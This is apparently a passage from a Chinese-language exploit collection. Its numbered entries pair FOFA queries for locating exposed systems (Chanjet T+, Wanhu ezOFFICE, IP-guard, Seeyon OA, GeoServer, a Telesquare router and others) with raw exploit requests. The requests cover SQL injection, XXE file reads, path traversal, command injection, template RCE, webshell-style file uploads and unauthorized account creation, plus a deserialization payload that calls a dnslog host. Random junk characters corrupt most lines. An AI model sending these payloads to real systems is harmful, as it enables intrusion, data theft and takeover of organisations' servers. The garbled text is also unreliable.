+ D+ f4 [$ ^5 U6 w# b& V
{
5 Z: N, I4 i2 S0 Q L3 q3 F "storeID":{* H: Z: Y' C) x1 X' \0 A
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
5 s7 e- N% e5 V7 _0 H "MethodName":"Start",; L' Q7 P9 ]& ?
"ObjectInstance":{ x& U% x: Y. I6 d5 b/ `- Z
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",( r" Y% r+ h/ a' m, f# V5 ~
"StartInfo": {# D8 F) N4 H; }+ j u( z
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",' V0 ~3 Y4 ]$ `, N1 a
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
5 w5 D, q0 u; L$ L n6 s; W0 w( m }, c. t3 I; u9 H& p1 z7 n/ h
}
6 t1 |4 w1 a, Z- } }
% |5 q1 _ R6 M! p}9 U" ]6 O# n5 I, g- {" R! e+ b
3 D- u8 \4 r2 ?) P
* M4 b8 e# H7 g3 @5 ?) C$ F. o' L
57. 畅捷通T+ keyEdit.aspx SQL注入9 u! x1 l' K2 t5 x5 A0 M
FOFA:app="畅捷通-TPlus"
0 t& v: {4 j) l* D) | g2 w7 ^9 E7 MGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.16 A/ l" i1 r9 E$ ]
Host: host8 X5 Y9 [4 B7 I( R8 f9 D
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36; Q4 J9 O" E2 x! l. ~9 P
Accept-Charset: utf-8* M+ w0 X% H' ^+ D; m" Y( l( ~
Accept-Encoding: gzip, deflate
6 p8 e H# n( m* s k& q: O0 YConnection: close# L# v( t& m: v2 n; ^
7 N4 y% ?5 t- u: _$ m
/ h' M$ e* E. v$ G! d8 V* T# L58. 畅捷通T+ KeyInfoList.aspx sql注入$ {: P; F) A. h% B8 v y; O
FOFA:app="畅捷通-TPlus"$ x$ b/ S0 u" G E4 v3 J
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1- |6 p2 c4 M, F: i
Host: your-ip
* C+ ?# M% Q4 Z! ~# T4 l1 G: z1 X. \ y$ nUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 V+ r$ c( U! [% ?/ c) y
Accept-Charset: utf-8+ Y1 F& s6 ^. Z. W( p. C
Accept-Encoding: gzip, deflate& ^ B) d9 |% G0 Y+ C
Connection: close
( I# b7 x9 Y; O1 \7 M Q( J
: B" X" G* {5 }- j5 t6 {
2 U+ E O0 v/ y* }/ `( y59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
8 i# d O! \# D; ]# ]* BFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
+ S0 q, d4 m s1 N) E; C' ~8 FPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
6 @0 V2 u3 D B: v' h+ d9 P1 aHost: 192.168.86.128:9090
( i/ @: `, Z3 a) a- t: T8 nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
. s) p+ ]) B7 A% W4 F$ vConnection: close
, ?/ l3 E* Y7 u6 B# D' l; m5 AContent-Length: 1669
. E$ J- A, @" j J! |/ ?Accept: */*9 |, v+ I9 ~* q( u
Accept-Language: en5 X0 J4 `; h }* }6 D; d! H
Content-Type: application/x-www-form-urlencoded
, S2 o9 V$ H" `( C$ k- iAccept-Encoding: gzip' m0 |. W% P5 q: f H$ L
[7 e, B9 _- h, Y( ^( K
PAYLOAD! J. E, i6 ]* k; p! c
& ]+ L* N- T1 W" p2 R( k- [8 E# z" f/ z- v. ]7 O
60. 百卓Smart管理平台 importexport.php SQL注入
* j! B, g6 m% D/ a; K. HFOFA:title="Smart管理平台" O" R" b! `* x5 c) e: s2 K
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
2 }3 r) ^. k4 b/ MHost:
, p/ I9 ?0 x6 h1 S _! |% ~" mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 G# R8 X6 z9 ?( V/ n% ]/ R" wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( k1 D3 |% M( d
Accept-Encoding: gzip, deflate
7 F' N4 |" j2 k, A, tAccept-Language: zh-CN,zh;q=0.9
* G; i' H+ D, g4 ~Connection: close) R( |& ^% t0 \
1 s+ t. ^; ]& n4 f9 Y) f
# j2 Q% g6 T% N' G9 T# H61. 浙大恩特客户资源管理系统 fileupload 任意文件上传* @# {* p! p- V4 a, ~
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
+ _( @' _8 }. U- FPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1, H4 P) z @* o
Host: x.x.x.x
* S% ]# b' ~7 ^) C3 J& H$ IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 w2 \9 d" P. S( ~/ f3 e" s) y% @Connection: close8 N+ G* d- v$ E j
Content-Length: 27
s, o& p! j2 p5 O1 ~5 I9 yAccept: */*
; S- P* s7 |) I6 n; g, EAccept-Encoding: gzip, deflate
$ _: f/ p8 k( ]& G- dAccept-Language: en- M# f- j% x8 c2 P# ?5 A
Content-Type: application/x-www-form-urlencoded
: g9 `" K. K4 C, }" U4 f. }; a6 B" ~
8uxssX66eqrqtKObcVa0kid98xa
4 n! I* j" x( @1 V, V9 ?; E/ ^& ^
7 M8 S4 }+ P7 {/ J* t, R3 f
2 {) e1 y" a% @62. IP-guard WebServer 远程命令执行
7 {6 Y, x, m! QFOFA:"IP-guard" && icon_hash="2030860561"" ?; X. n; |0 G* H- b( `
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1* s Y9 w8 g8 M6 Q/ Y
Host: x.x.x.x
s) L. M( q; E5 S% e" Y% U0 W" jUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
8 C) {( y3 n; j: UConnection: close0 Z# q) s1 Z+ [4 {
Accept: */*
" Z7 ^7 e% c! f- x6 \Accept-Language: en M" j2 ]' }& C* V0 H' t7 r
Accept-Encoding: gzip$ m* }1 ?0 I! A2 F& _( g
) |6 E) j# A5 x+ X1 @0 |
8 |9 @3 X* H) `4 R& j: H! P; C/ _
访问
9 M5 f5 }0 X& M% k9 B7 H- \) D% E; T9 `. F2 E
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.10 L, E" n8 ^ s% V7 @* ]
Host: x.x.x.x% `$ y8 y6 B% z, R% M: G
( u# Q) b; l d) y
) }7 s N' Y; _3 u9 x* ~5 F63. IP-guard WebServer任意文件读取' |: b$ B; R; @
IP-guard < 4.82.0609.0) i9 f% b. e: ]3 W6 _. t
FOFA:icon_hash="2030860561"
3 z# E! a t$ S* b$ N, r6 k cPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
; G6 Q5 R" b0 g8 u* iHost: your-ip0 ^( s( Z/ { V6 d' k" v3 q# A+ A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36! K7 j. M% X8 ?2 M; n; \6 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" k2 @5 c/ y0 S; r% P' a8 R# ^( L3 R
Accept-Encoding: gzip, deflate" S$ P8 @/ \ P2 e! u( ~5 j! ~
Accept-Language: zh-CN,zh;q=0.92 t* j' t# P: {1 W" T( W( n a
Connection: close
4 z6 _/ j/ P0 R/ Y3 A: TContent-Type: application/x-www-form-urlencoded ^' m/ f" c z* G7 r
3 b' |! P5 H$ h! [
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A7 c, x5 ^% K2 X8 c0 j9 |1 P
, J# r5 r7 I& m( @( l) D6 x: @& |
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
6 O# o1 @7 l6 V( mFOFA:body="/Scripts/EnjoyMsg.js"- b5 [8 d3 {& A; P
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
( k, y/ b; t# k, KHost: 192.168.86.128:9001
1 f1 {. s4 y; E% ^& I0 \+ r: f; ?User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 g. Q' }% b; L M7 u' P( s
Connection: close
5 g' `9 F6 t$ i$ mContent-Length: 369* w: V) y& Q- j3 N/ X, p; r
Accept: */** Q! L- V+ g; I" l; `
Accept-Language: en
' k. c) l+ K r& a$ q6 W" Q# OContent-Type: text/xml; charset=utf-8) e: c' V$ Q! G6 a4 r6 o
Accept-Encoding: gzip+ B7 I* t. D. W- J- k7 @4 i: s9 j0 X5 T V
' A% X! L! n! k( W' I+ R4 b/ C' ~: v<?xml version="1.0" encoding="utf-8"?>5 b; ?4 v5 W2 e! \2 q S
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
! { X$ d' n( t/ I' r& i" q+ S3 v<soap:Body>7 l6 E. c, E& B6 g3 V- j( _
<GetOSpById xmlns="http://tempuri.org/">8 ^( i/ s$ q8 R/ y) c7 q6 x# b
<sId>1';waitfor delay '0:0:5'--+</sId>
3 N+ K7 q4 k" |( H. }5 [& ~ </GetOSpById>
' `; c- O& @4 T6 h& s7 g. J </soap:Body>- n6 _/ u$ l8 Y! [4 Q& d! Z2 x! T& z, Y
</soap:Envelope>
; ~2 y5 {. Z6 |: T8 S
* L. G4 |" e$ P! I. z
* p& P. I2 @6 u- @65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过& d' \" H( `- D/ h6 P
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"8 U7 E: @ J5 b H# D
响应200即成功创建账号test123456/1234563 w% O% T+ v6 |" g0 E
POST /SystemMng.ashx HTTP/1.1
$ z4 i" j5 W+ m9 m# DHost:
6 h: j1 t$ R/ F/ F( yUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
6 j+ e: M/ X1 n9 N) F! bAccept-Encoding: gzip, deflate# o# J- {$ W* X
Accept: */*. l* W9 C2 q x" N
Connection: close
' v! Q( C, u8 E; MAccept-Language: en6 N# C* T; H$ ^: b6 }
Content-Length: 1740 q' e' x/ ^0 J+ ~2 {, l
1 z3 t ]- S0 r# ?, e7 `0 eoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators: }) w0 l+ N$ D7 a$ ^6 @4 I y( L* ^
* h/ n( X+ K8 l
2 F, j- I9 Q7 _* A. u
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
! E) E a, ?2 \! vFOFA:app="万户ezOFFICE协同管理平台"
; f1 `6 x+ r* H/ g8 v ^+ {: W5 g @ s6 E0 @( S
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1' w. @3 f9 F% B. G* l9 A/ Y
Host: x.x.x.x
# z' s* w0 F6 r2 }( \: mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
/ l: i. v" A5 B# {( rConnection: close$ R8 I8 h, Y+ h$ M( K
Accept: */*
- X5 v+ q: \# ?8 f7 lAccept-Language: en- T1 f0 Y1 s# u* T; T$ N: \/ v% n7 ~
Accept-Encoding: gzip$ d- E. @% t X5 B* S
* P! F- S0 L G. u! l( q" m
$ s) e6 D' v* L7 [4 h( i第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
3 ^8 z9 W1 J& i- Z. X2 z8 j3 K0 P3 b% C0 I
67. 万户ezOFFICE wpsservlet任意文件上传+ Q) _) D* @5 M+ @( _( p/ |# U
FOFA:app="万户网络-ezOFFICE"
, o3 ]) z6 A Y' onewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
+ }3 t# D, Z9 ~5 |: c. \9 YPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1% N' e7 ]: p/ l$ d
Host: x.x.x.x
' n/ Q$ L `1 ]5 G* u' XUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0# k5 }/ z: c9 u( b5 x4 l% o
Content-Length: 173
1 m8 a }8 `. l0 }9 x2 CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.80 c' o: q A: x% _
Accept-Encoding: gzip, deflate
" H( K* v+ a/ e* B" Z6 w% u$ bAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3+ M% v3 A7 Q' |/ o$ U2 B
Connection: close- O6 a" @" a( c2 U. R; D
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp' @; B) H3 L6 y4 O
DNT: 1
% b3 L9 v8 [) s! t- w1 k% TUpgrade-Insecure-Requests: 1
: e, V* t& J1 I' s, E" E, K' G# {6 @2 g
--ufuadpxathqvxfqnuyuqaozvseiueerp
6 T. t; V9 d7 X, S8 P, i$ aContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
2 ^6 M( g7 z5 j1 d0 g! d: P3 P: ?# w) y0 H% \
<% out.print("sasdfghjkj");%>3 m+ K- |0 _* b+ ^8 \, p' Q! [
--ufuadpxathqvxfqnuyuqaozvseiueerp--+ A) W9 f; x# X- c
, V/ I. F N3 \7 W
; W* w9 }) W3 j* A- p& x- I
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp. S3 p) U! ?- C3 t! |
1 v0 X. b6 E8 d' ?8 b3 e68. 万户ezOFFICE wf_printnum.jsp SQL注入: M1 \9 V7 H, u; q3 l% P
FOFA:app="万户ezOFFICE协同管理平台"4 P2 @/ L& }+ x: L# A% v8 m
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
2 |1 O8 ^3 R1 n7 w; dHost: {{host}}% C! A0 |7 \& t& g# W, x/ e/ c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
/ y! h& L( O2 O2 T9 ~Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8 E5 L$ r7 S+ r5 X, _. N
Accept-Encoding: gzip, deflate
# h3 i$ m# S0 |0 FAccept-Language: zh-CN,zh;q=0.9
' ?# P/ z' A5 Y4 N" \" `Connection: close+ g$ ~9 p k1 |3 b& \% K2 t; r
, {3 S5 ~6 E, r; x! Z- g- g
* G; \9 D6 j: N- l1 ]69. 万户 ezOFFICE contract_gd.jsp SQL注入
6 |6 K7 w6 c: e; x7 jFOFA:app="万户ezOFFICE协同管理平台": l* m ?9 k) b2 U
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1: y" x8 Y% l4 E- A& n# v o$ A& @. u# P
Host: your-ip
# \: o7 d9 j: j( i" eUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
( ^# c4 G/ M) B! i" }" H& H& s& fAccept-Encoding: gzip, deflate( w# ~! T4 Z; u- ?2 S$ E5 U) [
Accept: */*( A* `' i! n0 ^" |
Connection: keep-alive/ j7 s3 Y2 ?( ]5 b; X# V+ N7 Q
8 D7 z c$ d& Q! p4 T, l/ ^0 b( ^) k$ _% a T
70. 万户ezEIP success 命令执行0 A, b1 q4 c; ]. J7 }1 V$ s0 @: b$ V
FOFA:app="万户网络-ezEIP": K( E) \! _6 s4 ?. z' A; ?; S
POST /member/success.aspx HTTP/1.1/ U0 a& E* m% ]; h1 s; w* y
Host: {{Hostname}}
3 L: H, A- U4 s8 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.362 Z- s6 ^. c/ V! ~
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
& N- C9 c0 B1 N' g/ w0 MContent-Type: application/x-www-form-urlencoded
9 [% Y7 e1 a* z& MTYPE: C9 U, u' O8 U* N! S
Content-Length: 16702
) z: H/ ?, p) B+ t
' h) h- V @. R& i7 e" b__VIEWSTATE=PAYLOAD
3 r) G: Q4 e) c3 y l! s
* Y$ V, k# H7 h+ s1 G, w: ^$ h O8 f
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
) D9 }( t) f( S4 w/ JFOFA:body="PM2项目管理系统BS版增强工具.zip"
. {8 a7 |' ]$ {( Z3 |0 `! l, jGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1* x* i( L) d' I9 |
Host: x.x.x.xx.x.x.x9 _* X$ {2 \( n$ N0 @9 Y5 A
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
7 f3 \2 a+ g6 K8 i1 {: gConnection: close
# w3 L; i. U7 M0 H/ A. }$ c$ rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 i/ R( B2 ~; `! w& Q4 UAccept-Encoding: gzip, deflate
4 d5 i" I8 x; ] [) Z, IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( Y: L7 E: q$ _2 n: _Upgrade-Insecure-Requests: 1" t o# z# s6 r
0 v# `2 i% o* n. F( r% E6 a
3 g: v! N/ X( b
72. 致远OA getAjaxDataServlet XXE
1 J$ \6 l" E" W$ I- @% bFOFA:app="致远互联-OA"
9 Q3 J4 q& ~9 Y. TPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1" ]2 z+ A; o% v/ R
Host: 192.168.40.131:8099$ B9 S5 l- o4 R* |- Q
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" i6 z7 g( u+ T% |
Connection: close
3 Y; u4 k. ?+ h$ @ XContent-Length: 583# h+ t# G% F( w3 |) M/ @
Content-Type: application/x-www-form-urlencoded
+ s: K, s3 P( r. p3 q% ?6 u. D% vAccept-Encoding: gzip
I' _5 q% B# b7 J1 U8 J3 n" b1 G0 P3 |+ `1 f0 N3 a
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
3 k( X0 L3 o" M, j0 o" T1 E* k- U
4 G& r( L: V9 q# k: ]& P
73. GeoServer wms远程代码执行0 |! i3 u$ o* `
FOFA:icon_hash=”97540678”! x: ^) s" [1 r( M
POST /geoserver/wms HTTP/1.1( d& S/ r+ z( i& @' b! c
Host:$ s6 Y- F2 B0 R- E/ M& ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.363 `8 R5 G, ^$ L- q/ W2 L% ~
Content-Length: 1981
( N* Y6 [( h: EAccept-Encoding: gzip, deflate
: A1 L/ T' y! D6 n. q" w; bConnection: close+ D8 s8 |$ g8 c% D
Content-Type: application/xml0 \8 R& g# R" C4 O, m
SL-CE-SUID: 3' Y5 c3 V2 O+ h) R. Q- z
% ]% k. F+ W( V/ S# ~( O; `
PAYLOAD
0 v% Q/ ?* |2 k
6 D+ \/ ?; r* W& y1 d u- T) s% [7 u& v: b: n1 u2 y4 v# W) M! |
74. 致远M3-server 6_1sp1 反序列化RCE" i' v. Q# l2 w$ U. L
FOFA:title="M3-Server"
' a T+ q3 L# gPAYLOAD' T- O8 Q5 x+ Y# A
- J8 z7 z j& H* m. m
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE5 A$ F& E) ~& n. h, p
FOFA:app="TELESQUARE-TLR-2005KSH"' W* D% L, @' j3 j! z. w* j2 N0 ]
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1' I' C* z) J+ [2 @7 }
Host: x.x.x.x
- d( s9 D- q3 q7 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# L2 T* Y: ^0 }* X
Connection: close
( T- v2 g# H: ]6 IAccept: */*
9 q1 I- r" G# B/ t6 W, vAccept-Language: en( w) m1 f+ J) V
Accept-Encoding: gzip' J7 }. b8 w- V& c
/ t; {2 \3 s2 H9 \. L
5 A3 b/ {5 o7 s3 @ i1 a" `' lGET /cgi-bin/test28256.txt HTTP/1.1
# A2 [) ~5 N9 a) J0 O5 V- f; r7 bHost: x.x.x.x
% x0 n% i4 o. N- p) M- G
8 \0 M$ J$ a" c% U3 u7 T: `6 E# ?! E3 |; e& I6 Y
76. 新开普掌上校园服务管理平台service.action远程命令执行
. I: z7 ^. t4 u# y: E6 d! KFOFA:title="掌上校园服务管理平台"6 `% k& V* M" U+ H# |# c" E A: P
POST /service_transport/service.action HTTP/1.1
, @( I4 C: d" v0 sHost: x.x.x.x7 ?' z6 Y" S! y9 H c5 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0& V" l3 V7 F1 ]. x, E1 B) @
Connection: close
& B8 q: M1 G8 Z& F7 a9 U6 nContent-Length: 2118 _9 F5 B7 A' o: ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' }0 ?& g" S) {2 f R9 L+ z& H
Accept-Encoding: gzip, deflate3 [' l5 ~' @; m* E$ |. @, ]0 L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 u. \' ^) I f# O6 D$ L1 C* V9 ]
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
* C1 I, u8 W: b B' J d4 N- N" y* JUpgrade-Insecure-Requests: 13 R+ P6 G5 H; C: \8 O
5 `# _1 x4 i/ d- a6 a: [) v
{
: i* z, d1 T# f+ E$ Y7 Y"command": "GetFZinfo",4 K! z4 }5 `4 v, b1 p
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\") J. V4 n3 K) U1 y4 V0 Z" F: q; M
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"! S( }) y8 V2 x( Y* Y- w+ ]) V
}( ~9 p2 w" P8 X$ ?
! B" L1 \, u6 C4 B2 X
9 C# D+ N1 J: L0 p' @. sGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
2 [8 l. J7 U3 wHost: x.x.x.x, Y" j3 {2 r, @! O) R
6 k( m; a5 b9 e, N* \6 S$ L( Z7 F% k3 ] C( t
# @. }% q3 @- f5 {* {, t3 t77. F22服装管理软件系统UploadHandler.ashx任意文件上传4 m1 J4 f( v9 C# r3 d) _/ T% F \2 e
FOFA:body="F22WEB登陆"+ b( R, e6 I& [; s
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1. X0 v& x( v( f2 O
Host: x.x.x.x( l/ b6 L o- @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 h" _1 g) @9 @; XConnection: close
. u8 N6 P! U. T9 g( @Content-Length: 433
$ p! D4 @! e P5 V: tAccept: */*
! B7 e, R' t' n! o& cAccept-Encoding: gzip, deflate
/ z" m' P" G) G: |! o8 EAccept-Language: zh-CN,zh;q=0.9
: ?& W F8 E9 Y0 J! L' O: \Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
# o- M; h/ Y, Y) b. M1 w- F5 \! Z; J4 [
" @2 h, _8 K( R3 w: ^5 s------------398jnjVTTlDVXHlE7yYnfwBoix
. e- l/ X0 U& K9 r8 K" t3 gContent-Disposition: form-data; name="folder"
+ \( r6 H2 f6 T7 U4 r2 W5 E; u+ v% y/ I& U* u4 S
/upload/udplog
3 a" {1 t9 O0 `: ] g------------398jnjVTTlDVXHlE7yYnfwBoix
- E& s; j/ S* H4 V( r2 v& ^% yContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
* `" e# W6 L: V6 R$ j% b& ?Content-Type: application/octet-stream4 q+ ]4 B' o3 m9 L9 ]$ ?- U
. A3 O ~3 V. L9 _2 A& J9 thello12345678 a6 S3 [& N- q- Q' O8 A1 g4 J
------------398jnjVTTlDVXHlE7yYnfwBoix4 [% h' p' Y( w2 H5 P% Q
Content-Disposition: form-data; name="Upload"( S( Y: J. ?, ?/ B
9 U. c0 T. W& H" }+ [Submit Query; V- a5 V1 r/ {1 D. V4 R
------------398jnjVTTlDVXHlE7yYnfwBoix--
! F( u/ d: u8 k, ^+ G: w5 N; H5 T
( m J" B; _9 A+ \% J" W* ?% `& b
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传. C* z1 r. T5 Q% K) y( I
FOFA:icon_hash="2001627082"% A0 Q8 s; _5 U7 i6 |( l
POST /Platform/System/FileUpload.ashx HTTP/1.1
+ v. p$ k' A4 K" G" IHost: x.x.x.x1 i- k9 @9 V1 a; [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 v# v0 Q s% f) F% b: ], z' gConnection: close7 d5 m8 D! m* s. j! r" a, y6 N) E
Content-Length: 336
4 c8 {6 M% \) K7 B& X8 x; }Accept-Encoding: gzip7 X0 o) I4 x9 A# E- Q& ^
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l. Q- ~) A( W; F, |3 G! z3 g
9 t: H% F2 n! z, L, R/ G: k
------YsOxWxSvj1KyZow1PTsh98fdu6l# G+ s: M5 l% ~6 u6 w
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"( L5 A4 ?6 e% |2 k) U' U, v, \
Content-Type: image/png
3 _* u# V7 s# Q/ ?
' K8 I( i; W, N% K" Y% DYsOxWxSvj1KyZow1PTsh98fdu6l% [7 \* v$ N, x* H! j
------YsOxWxSvj1KyZow1PTsh98fdu6l
8 @3 B* U9 p6 ?4 S' R7 X" K. V2 [Content-Disposition: form-data; name="target"; Y; Y' u z# k+ y2 s- c0 q
; ^: ?3 F( s( @4 \1 _3 c! g* f/Applications/SkillDevelopAndEHS/2 H8 Z2 x$ W# q" Z3 s
